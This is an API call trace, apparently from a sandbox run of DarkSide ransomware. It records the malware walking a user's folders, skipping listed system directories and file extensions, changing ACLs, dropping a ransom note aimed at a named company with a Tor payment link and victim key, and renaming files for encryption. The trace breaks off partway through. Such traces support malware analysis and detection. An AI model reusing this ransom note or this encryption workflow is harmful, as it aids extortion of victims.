returned 0x7 [0159.158] _wcsicmp (_Str1="bckp", _Str2="Microsoft Websites") returned -11 [0159.158] wcslen (_String="bckp") returned 0x4 [0159.158] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0159.160] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0159.161] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0159.161] _wcsicmp (_Str1="$recycle.bin", _Str2="MSN Websites") returned -73 [0159.161] wcslen (_String="$recycle.bin") returned 0xc [0159.161] _wcsicmp (_Str1="config.msi", _Str2="MSN Websites") returned -10 [0159.161] wcslen (_String="config.msi") returned 0xa [0159.161] _wcsicmp (_Str1="$windows.~bt", _Str2="MSN Websites") returned -73 [0159.161] wcslen (_String="$windows.~bt") returned 0xc [0159.161] _wcsicmp (_Str1="$windows.~ws", _Str2="MSN Websites") returned -73 [0159.161] wcslen (_String="$windows.~ws") returned 0xc [0159.161] _wcsicmp (_Str1="windows", _Str2="MSN Websites") returned 10 [0159.161] wcslen (_String="windows") returned 0x7 [0159.161] _wcsicmp (_Str1="appdata", _Str2="MSN Websites") returned -12 [0159.161] wcslen (_String="appdata") returned 0x7 [0159.161] _wcsicmp (_Str1="application data", _Str2="MSN Websites") returned -12 [0159.161] wcslen (_String="application data") returned 0x10 [0159.161] _wcsicmp (_Str1="boot", _Str2="MSN Websites") returned -11 [0159.161] wcslen (_String="boot") returned 0x4 [0159.161] _wcsicmp (_Str1="google", _Str2="MSN Websites") returned -6 [0159.161] wcslen (_String="google") returned 0x6 [0159.161] _wcsicmp (_Str1="mozilla", _Str2="MSN Websites") returned -4 [0159.161] wcslen (_String="mozilla") returned 0x7 [0159.161] _wcsicmp (_Str1="program files", _Str2="MSN Websites") returned 3 [0159.161] wcslen (_String="program files") returned 0xd [0159.161] _wcsicmp (_Str1="program files (x86)", _Str2="MSN Websites") returned 3 [0159.161] wcslen (_String="program files (x86)") returned 0x13 [0159.161] _wcsicmp (_Str1="programdata", _Str2="MSN Websites") returned 3 [0159.161] wcslen (_String="programdata") returned 0xb [0159.161] _wcsicmp (_Str1="system volume information", _Str2="MSN Websites") returned 6 [0159.161] wcslen (_String="system volume information") returned 0x19 [0159.162] _wcsicmp (_Str1="tor browser", _Str2="MSN Websites") returned 7 [0159.162] wcslen (_String="tor browser") returned 0xb [0159.162] _wcsicmp (_Str1="windows.old", _Str2="MSN Websites") returned 10 [0159.162] wcslen (_String="windows.old") returned 0xb [0159.162] _wcsicmp (_Str1="intel", _Str2="MSN Websites") returned -4 [0159.162] wcslen (_String="intel") returned 0x5 [0159.162] _wcsicmp (_Str1="msocache", _Str2="MSN Websites") returned 1 [0159.162] wcslen (_String="msocache") returned 0x8 [0159.162] _wcsicmp (_Str1="perflogs", _Str2="MSN Websites") returned 3 [0159.162] wcslen (_String="perflogs") returned 0x8 [0159.162] _wcsicmp (_Str1="x64dbg", _Str2="MSN Websites") returned 11 [0159.162] wcslen (_String="x64dbg") returned 0x6 [0159.162] _wcsicmp (_Str1="public", _Str2="MSN Websites") returned 3 [0159.162] wcslen (_String="public") returned 0x6 [0159.162] _wcsicmp (_Str1="all users", _Str2="MSN Websites") returned -12 [0159.162] wcslen (_String="all users") returned 0x9 [0159.162] _wcsicmp (_Str1="default", _Str2="MSN Websites") returned -9 [0159.162] wcslen (_String="default") returned 0x7 [0159.162] wcscpy (in: _Dest=0x208e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*" [0159.162] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*") returned 0x2d [0159.162] wcscpy (in: _Dest=0x208e78, _Source="MSN Websites" | out: _Dest="MSN Websites") returned="MSN Websites" [0159.162] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0159.162] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0159.163] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" [0159.163] GetNamedSecurityInfoW () returned 0x0 [0159.163] SetEntriesInAclW () returned 0x0 [0159.163] SetNamedSecurityInfoW () returned 0x0 [0159.168] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x22b528) returned 1 [0159.168] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32e8ec | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0159.168] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites")) returned 1 [0159.168] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0159.168] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0159.169] WriteFile (in: hFile=0x1a4, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32e8bc, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32e8bc*=0x7ca, lpOverlapped=0x0) returned 1 [0159.170] CloseHandle (hObject=0x1a4) returned 1 [0159.170] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0159.170] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites")) returned 0x10 [0159.170] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="" [0159.170] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 0x39 [0159.170] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*", fInfoLevelId=0x0, lpFindFileData=0x32eb1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32eb1c) returned 0x154188 [0159.171] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8c921000, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8c921000, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0159.171] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0159.171] _wcsicmp (_Str1="MSN Autos.url", _Str2="README.c06622a1.TXT") returned -5 [0159.171] wcsstr (_Str="MSN Autos.url", _SubStr="README") returned 0x0 [0159.171] _wcsicmp (_Str1="autorun.inf", _Str2="MSN Autos.url") returned -12 [0159.171] wcslen (_String="autorun.inf") returned 0xb [0159.171] _wcsicmp (_Str1="boot.ini", _Str2="MSN Autos.url") returned -11 [0159.171] wcslen (_String="boot.ini") returned 0x8 [0159.171] _wcsicmp (_Str1="bootfont.bin", _Str2="MSN Autos.url") returned -11 [0159.171] wcslen (_String="bootfont.bin") returned 0xc [0159.171] _wcsicmp (_Str1="bootsect.bak", _Str2="MSN Autos.url") returned -11 [0159.171] wcslen (_String="bootsect.bak") returned 0xc [0159.171] _wcsicmp (_Str1="desktop.ini", _Str2="MSN Autos.url") returned -9 [0159.171] wcslen (_String="desktop.ini") returned 0xb [0159.171] _wcsicmp (_Str1="iconcache.db", _Str2="MSN Autos.url") returned -4 [0159.171] wcslen (_String="iconcache.db") returned 0xc [0159.172] _wcsicmp (_Str1="ntldr", _Str2="MSN Autos.url") returned 1 [0159.172] wcslen (_String="ntldr") returned 0x5 [0159.172] _wcsicmp (_Str1="ntuser.dat", _Str2="MSN Autos.url") returned 1 [0159.172] wcslen (_String="ntuser.dat") returned 0xa [0159.172] _wcsicmp (_Str1="ntuser.dat.log", _Str2="MSN Autos.url") returned 1 [0159.172] wcslen (_String="ntuser.dat.log") returned 0xe [0159.172] _wcsicmp (_Str1="ntuser.ini", _Str2="MSN Autos.url") returned 1 [0159.172] wcslen (_String="ntuser.ini") returned 0xa [0159.172] _wcsicmp (_Str1="thumbs.db", _Str2="MSN Autos.url") returned 7 [0159.172] wcslen (_String="thumbs.db") returned 0x9 [0159.172] _wcsicmp (_Str1="386", _Str2="url") returned -66 [0159.172] wcslen (_String="386") returned 0x3 [0159.172] _wcsicmp (_Str1="adv", _Str2="url") returned -20 [0159.172] wcslen (_String="adv") returned 0x3 [0159.172] _wcsicmp (_Str1="ani", _Str2="url") returned -20 [0159.172] wcslen (_String="ani") returned 0x3 [0159.172] _wcsicmp (_Str1="bat", _Str2="url") returned -19 [0159.172] wcslen (_String="bat") returned 0x3 [0159.172] _wcsicmp (_Str1="bin", _Str2="url") returned -19 [0159.172] wcslen (_String="bin") returned 0x3 [0159.172] _wcsicmp (_Str1="cab", _Str2="url") returned -18 [0159.172] wcslen (_String="cab") returned 0x3 [0159.172] _wcsicmp (_Str1="cmd", _Str2="url") returned -18 [0159.172] wcslen (_String="cmd") returned 0x3 [0159.172] _wcsicmp (_Str1="com", _Str2="url") returned -18 [0159.172] wcslen (_String="com") returned 0x3 [0159.172] _wcsicmp (_Str1="cpl", _Str2="url") returned -18 [0159.172] wcslen (_String="cpl") returned 0x3 [0159.172] _wcsicmp (_Str1="cur", _Str2="url") returned -18 [0159.173] wcslen (_String="cur") returned 0x3 [0159.173] _wcsicmp (_Str1="deskthemepack", _Str2="url") returned -17 [0159.173] wcslen (_String="deskthemepack") returned 0xd [0159.173] _wcsicmp (_Str1="diagcab", _Str2="url") returned -17 [0159.173] wcslen (_String="diagcab") returned 0x7 [0159.173] _wcsicmp (_Str1="diagcfg", _Str2="url") returned -17 [0159.173] wcslen (_String="diagcfg") returned 0x7 [0159.173] _wcsicmp (_Str1="diagpkg", _Str2="url") returned -17 [0159.173] wcslen (_String="diagpkg") returned 0x7 [0159.173] _wcsicmp (_Str1="dll", _Str2="url") returned -17 [0159.173] wcslen (_String="dll") returned 0x3 [0159.173] _wcsicmp (_Str1="drv", _Str2="url") returned -17 [0159.173] wcslen (_String="drv") returned 0x3 [0159.173] _wcsicmp (_Str1="exe", _Str2="url") returned -16 [0159.173] wcslen (_String="exe") returned 0x3 [0159.173] _wcsicmp (_Str1="hlp", _Str2="url") returned -13 [0159.173] wcslen (_String="hlp") returned 0x3 [0159.173] _wcsicmp (_Str1="icl", _Str2="url") returned -12 [0159.173] wcslen (_String="icl") returned 0x3 [0159.173] _wcsicmp (_Str1="icns", _Str2="url") returned -12 [0159.173] wcslen (_String="icns") returned 0x4 [0159.173] _wcsicmp (_Str1="ico", _Str2="url") returned -12 [0159.173] wcslen (_String="ico") returned 0x3 [0159.173] _wcsicmp (_Str1="ics", _Str2="url") returned -12 [0159.174] wcslen (_String="ics") returned 0x3 [0159.174] _wcsicmp (_Str1="idx", _Str2="url") returned -12 [0159.174] wcslen (_String="idx") returned 0x3 [0159.174] _wcsicmp (_Str1="ldf", _Str2="url") returned -9 [0159.174] wcslen (_String="ldf") returned 0x3 [0159.174] _wcsicmp (_Str1="lnk", _Str2="url") returned -9 [0159.174] wcslen (_String="lnk") returned 0x3 [0159.174] _wcsicmp (_Str1="mod", _Str2="url") returned -8 [0159.174] wcslen (_String="mod") returned 0x3 [0159.174] _wcsicmp (_Str1="mpa", _Str2="url") returned -8 [0159.174] wcslen (_String="mpa") returned 0x3 [0159.174] _wcsicmp (_Str1="msc", _Str2="url") returned -8 [0159.174] wcslen (_String="msc") returned 0x3 [0159.174] _wcsicmp (_Str1="msp", _Str2="url") returned -8 [0159.174] wcslen (_String="msp") returned 0x3 [0159.174] _wcsicmp (_Str1="msstyles", _Str2="url") returned -8 [0159.174] wcslen (_String="msstyles") returned 0x8 [0159.174] _wcsicmp (_Str1="msu", _Str2="url") returned -8 [0159.174] wcslen (_String="msu") returned 0x3 [0159.174] _wcsicmp (_Str1="nls", _Str2="url") returned -7 [0159.174] wcslen (_String="nls") returned 0x3 [0159.174] _wcsicmp (_Str1="nomedia", _Str2="url") returned -7 [0159.174] wcslen (_String="nomedia") returned 0x7 [0159.174] _wcsicmp (_Str1="ocx", _Str2="url") returned -6 [0159.174] wcslen (_String="ocx") returned 0x3 [0159.174] _wcsicmp (_Str1="prf", _Str2="url") returned -5 [0159.175] wcslen (_String="prf") returned 0x3 [0159.175] _wcsicmp (_Str1="ps1", _Str2="url") returned -5 [0159.175] wcslen (_String="ps1") returned 0x3 [0159.175] _wcsicmp (_Str1="rom", _Str2="url") returned -3 [0159.175] wcslen (_String="rom") returned 0x3 [0159.175] _wcsicmp (_Str1="rtp", _Str2="url") returned -3 [0159.175] wcslen (_String="rtp") returned 0x3 [0159.175] _wcsicmp (_Str1="scr", _Str2="url") returned -2 [0159.175] wcslen (_String="scr") returned 0x3 [0159.175] _wcsicmp (_Str1="shs", _Str2="url") returned -2 [0159.175] wcslen (_String="shs") returned 0x3 [0159.175] _wcsicmp (_Str1="spl", _Str2="url") returned -2 [0159.175] wcslen (_String="spl") returned 0x3 [0159.175] _wcsicmp (_Str1="sys", _Str2="url") returned -2 [0159.175] wcslen (_String="sys") returned 0x3 [0159.175] _wcsicmp (_Str1="theme", _Str2="url") returned -1 [0159.175] wcslen (_String="theme") returned 0x5 [0159.175] _wcsicmp (_Str1="themepack", _Str2="url") returned -1 [0159.176] wcslen (_String="themepack") returned 0x9 [0159.176] _wcsicmp (_Str1="wpx", _Str2="url") returned 2 [0159.176] wcslen (_String="wpx") returned 0x3 [0159.176] _wcsicmp (_Str1="lock", _Str2="url") returned -9 [0159.176] wcslen (_String="lock") returned 0x4 [0159.176] _wcsicmp (_Str1="key", _Str2="url") returned -10 [0159.176] wcslen (_String="key") returned 0x3 [0159.176] _wcsicmp (_Str1="hta", _Str2="url") returned -13 [0159.176] wcslen (_String="hta") returned 0x3 [0159.176] _wcsicmp (_Str1="msi", _Str2="url") returned -8 [0159.176] wcslen (_String="msi") returned 0x3 [0159.176] _wcsicmp (_Str1="pdb", _Str2="url") returned -5 [0159.176] wcslen (_String="pdb") returned 0x3 [0159.176] _wcsicmp (_Str1="sqlite", _Str2="url") returned -2 [0159.176] wcslen (_String="sqlite") returned 0x6 [0159.176] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites")) returned 0x10 [0159.176] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0159.176] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" [0159.176] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned 0x38 [0159.176] wcscpy (in: _Dest=0x32400d2, _Source="MSN Autos.url" | out: _Dest="MSN Autos.url") returned="MSN Autos.url" [0159.176] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url", dwFileAttributes=0x80) returned 1 [0159.179] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0159.179] SetFilePointerEx (in: hFile=0x1c8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0159.179] CloseHandle (hObject=0x1c8) returned 1 [0159.179] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0159.179] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" [0159.179] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url") returned 0x46 [0159.179] wcscpy (in: _Dest=0x32500f4, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0159.179] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url.c06622a1"), dwFlags=0x8) returned 1 [0159.183] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1c8 [0159.183] CreateIoCompletionPort (FileHandle=0x1c8, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0159.183] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3510020 [0159.190] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5e92c12a [0159.190] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6b1825e8 [0159.190] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5226a204 [0159.190] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x441357b8 [0159.190] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xd9d1e2f [0159.190] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x287b0988 [0159.190] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4a39b817 [0159.190] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x390b9703 [0159.193] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3510094, Length=0x80) returned 0xe716fc4a [0159.193] RtlComputeCrc32 (PartialCrc=0xfc4a, Buffer=0x3510094, Length=0x80) returned 0x8428d5f4 [0159.193] RtlComputeCrc32 (PartialCrc=0xd5f4, Buffer=0x3510094, Length=0x80) returned 0x870a58f0 [0159.193] RtlComputeCrc32 (PartialCrc=0x58f0, Buffer=0x3510094, Length=0x80) returned 0x6c5ba5cc [0159.193] RtlComputeCrc32 (PartialCrc=0xa5cc, Buffer=0x3510094, Length=0x80) returned 0xa171e7f1 [0159.193] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3510020) returned 1 [0159.193] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0159.193] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0159.194] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0159.194] _wcsicmp (_Str1="MSN Entertainment.url", _Str2="README.c06622a1.TXT") returned -5 [0159.194] wcsstr (_Str="MSN Entertainment.url", _SubStr="README") returned 0x0 [0159.194] _wcsicmp (_Str1="autorun.inf", _Str2="MSN Entertainment.url") returned -12 [0159.194] wcslen (_String="autorun.inf") returned 0xb [0159.194] _wcsicmp (_Str1="boot.ini", _Str2="MSN Entertainment.url") returned -11 [0159.194] wcslen (_String="boot.ini") returned 0x8 [0159.194] _wcsicmp (_Str1="bootfont.bin", _Str2="MSN Entertainment.url") returned -11 [0159.194] wcslen (_String="bootfont.bin") returned 0xc [0159.194] _wcsicmp (_Str1="bootsect.bak", _Str2="MSN Entertainment.url") returned -11 [0159.194] wcslen (_String="bootsect.bak") returned 0xc [0159.194] _wcsicmp (_Str1="desktop.ini", _Str2="MSN Entertainment.url") returned -9 [0159.194] wcslen (_String="desktop.ini") returned 0xb [0159.194] _wcsicmp (_Str1="iconcache.db", _Str2="MSN Entertainment.url") returned -4 [0159.194] wcslen (_String="iconcache.db") returned 0xc [0159.194] _wcsicmp (_Str1="ntldr", _Str2="MSN Entertainment.url") returned 1 [0159.194] wcslen (_String="ntldr") returned 0x5 [0159.194] _wcsicmp (_Str1="ntuser.dat", _Str2="MSN Entertainment.url") returned 1 [0159.194] wcslen (_String="ntuser.dat") returned 0xa [0159.194] _wcsicmp (_Str1="ntuser.dat.log", _Str2="MSN Entertainment.url") returned 1 [0159.194] wcslen (_String="ntuser.dat.log") returned 0xe [0159.194] _wcsicmp (_Str1="ntuser.ini", _Str2="MSN Entertainment.url") returned 1 [0159.194] wcslen (_String="ntuser.ini") returned 0xa [0159.194] _wcsicmp (_Str1="thumbs.db", _Str2="MSN Entertainment.url") returned 7 [0159.194] wcslen (_String="thumbs.db") returned 0x9 [0159.194] _wcsicmp (_Str1="386", _Str2="url") returned -66 [0159.194] wcslen (_String="386") returned 0x3 [0159.194] _wcsicmp (_Str1="adv", _Str2="url") returned -20 [0159.194] wcslen (_String="adv") returned 0x3 [0159.194] _wcsicmp (_Str1="ani", _Str2="url") returned -20 [0159.194] wcslen (_String="ani") returned 0x3 [0159.194] _wcsicmp (_Str1="bat", _Str2="url") returned -19 [0159.195] wcslen (_String="bat") returned 0x3 [0159.195] _wcsicmp (_Str1="bin", _Str2="url") returned -19 [0159.195] wcslen (_String="bin") returned 0x3 [0159.195] _wcsicmp (_Str1="cab", _Str2="url") returned -18 [0159.195] wcslen (_String="cab") returned 0x3 [0159.195] _wcsicmp (_Str1="cmd", _Str2="url") returned -18 [0159.195] wcslen (_String="cmd") returned 0x3 [0159.195] _wcsicmp (_Str1="com", _Str2="url") returned -18 [0159.195] wcslen (_String="com") returned 0x3 [0159.195] _wcsicmp (_Str1="cpl", _Str2="url") returned -18 [0159.195] wcslen (_String="cpl") returned 0x3 [0159.195] _wcsicmp (_Str1="cur", _Str2="url") returned -18 [0159.195] wcslen (_String="cur") returned 0x3 [0159.195] _wcsicmp (_Str1="deskthemepack", _Str2="url") returned -17 [0159.195] wcslen (_String="deskthemepack") returned 0xd [0159.195] _wcsicmp (_Str1="diagcab", _Str2="url") returned -17 [0159.195] wcslen (_String="diagcab") returned 0x7 [0159.195] _wcsicmp (_Str1="diagcfg", _Str2="url") returned -17 [0159.195] wcslen (_String="diagcfg") returned 0x7 [0159.195] _wcsicmp (_Str1="diagpkg", _Str2="url") returned -17 [0159.195] wcslen (_String="diagpkg") returned 0x7 [0159.195] _wcsicmp (_Str1="dll", _Str2="url") returned -17 [0159.195] wcslen (_String="dll") returned 0x3 [0159.195] _wcsicmp (_Str1="drv", _Str2="url") returned -17 [0159.195] wcslen (_String="drv") returned 0x3 [0159.195] _wcsicmp (_Str1="exe", _Str2="url") returned -16 [0159.195] wcslen (_String="exe") returned 0x3 [0159.195] _wcsicmp (_Str1="hlp", _Str2="url") returned -13 [0159.195] wcslen (_String="hlp") returned 0x3 [0159.195] _wcsicmp (_Str1="icl", _Str2="url") returned -12 [0159.195] wcslen (_String="icl") returned 0x3 [0159.195] _wcsicmp (_Str1="icns", _Str2="url") returned -12 [0159.195] wcslen (_String="icns") returned 0x4 [0159.195] _wcsicmp (_Str1="ico", _Str2="url") returned -12 [0159.195] wcslen (_String="ico") returned 0x3 